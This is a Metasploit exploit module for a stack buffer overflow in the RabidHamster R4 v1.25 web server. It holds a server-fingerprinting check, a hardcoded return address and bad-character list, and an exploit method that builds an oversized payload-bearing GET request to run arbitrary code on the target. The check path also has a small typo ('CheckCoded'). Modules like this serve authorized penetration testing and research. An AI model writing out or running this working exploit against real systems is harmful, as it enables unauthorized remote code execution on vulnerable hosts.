##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in RabidHamster R4's web server.
          By supplying a malformed HTTP request, it is possible to trigger a stack-based
          buffer overflow when generating a log, which may result in arbitrary code
          execution under the context of the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Luigi Auriemma', # Discovery, PoC
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['OSVDB', '79007'],
          ['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
        ],
        'Payload' => {
          'StackAdjustment' => -3500,
          'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Targets' => [
          ['R4 v1.25', { 'Ret' => 0x73790533 }] # JMP ESI (ddraw.dll)
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-02-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 8888])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/'
    })

    if res and res.headers['Server'] == 'R4 Embedded Server'
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCoded::Safe
    end
  end

  def exploit
    buf = ''
    buf << payload.encoded
    buf << rand_text_alpha(2022 - buf.length, payload_badchars)
    buf << [target.ret].pack("V*")
    buf << pattern_create(200)
    buf << rand_text_alpha(3000 - buf.length, payload_badchars)

    send_request_cgi({
      'method' => 'GET',
      'uri' => "/?#{buf}"
    })
  end
end
